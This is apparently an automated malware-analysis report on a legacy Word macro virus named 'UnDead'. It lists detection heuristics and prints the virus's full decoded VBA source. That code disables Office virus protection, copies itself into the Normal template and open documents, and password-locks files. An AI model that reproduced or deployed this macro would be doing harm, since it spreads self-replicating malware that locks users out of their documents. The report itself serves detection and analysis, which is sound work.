MALICIOUS
288
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a legacy Word document containing a WordBasic macro that attempts to copy itself to the Normal template and the active document, indicating a potential infection mechanism. The document body explicitly instructs the user to download a zip file named 'HYP M7.UnDead.zip', suggesting a social engineering lure. The presence of legacy macro markers and the AutoOpen macro further support its malicious intent.
Heuristics 6
-
ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Beauty-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 49,152 bytes but its declared streams total only 24,711 bytes — 24,441 bytes (50%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2892 bytes |
SHA-256: f52196a1057ccff58433fb6db011ed2ee4d52b20da48cf3336194eb83818f0ea |
|||
|
Detection
ClamAV:
Doc.Trojan.DWMVCK1-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UnDead"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "[ UnDead Virus Team ]"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Normal.Stupid.AutoOpen"
On Error GoTo Stupid
Payload
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Set ActiveDoc = ActiveDocument
Set GlobalDoc = NormalTemplate
DocumentInstalled = False
GlobalInstalled = False
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(I).Name = "UnDead" Then
DocumentInstalled = True
End If
Next
For J = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(J).Name = "UnDead" Then
GlobalInstalled = True
End If
Next
If DocumentInstalled = False Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="UnDead", Object:=wdOrganizerObjectProjectItems
ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
End If
If GlobalInstalled = False Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="UnDead", Object:=wdOrganizerObjectProjectItems
Options.SaveNormalPrompt = False
End If
Application.DisplayAlerts = wdAlertsAll
Stupid:
End Sub
'------------------------------------------------------------
'Payload macro
'Annoys the user
'------------------------------------------------------------
Sub Payload()
Attribute Payload.VB_Description = "[ UnDead Virus Team ]"
Attribute Payload.VB_ProcData.VB_Invoke_Func = "Normal.Stupid.Payload"
On Error Resume Next
For B = 0 To 2
Beep
Next
W = Int(Rnd() * 7) + 1
T = Int(Rnd() * 2) + 1
If Day(Now()) = Int(Rnd() * 30) + 1 Or WeekDay(Now()) = W Then Hell
If Day(Now()) = Int(Rnd() * 30) + 1 Or WeekDay(Now()) = T Then Virus
WordBasic.FileSaveAs Format:=1
End Sub
Private Sub Hell()
Dim fp$
Dim fn$
fp$ = WordBasic.[Time$]()
fn$ = WordBasic.[FileName$]()
WordBasic.ToolsOptionsSave Password:=fp$, WritePassword:=fp$
WordBasic.MsgBox "oh no!!!, your file was infected by virus", "WM97.UnDead", 16
WordBasic.FileExit 1
End Sub
Private Sub Virus()
frmVirus.Show
End Sub
Sub ToolsMacro()
MsgBox "Error office97.dll", vbCritical, Title:="WM97.UnDead"
End Sub
Sub ViewVBCode()
MsgBox "Microsoft VBA", Title:="WM97.UnDead"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.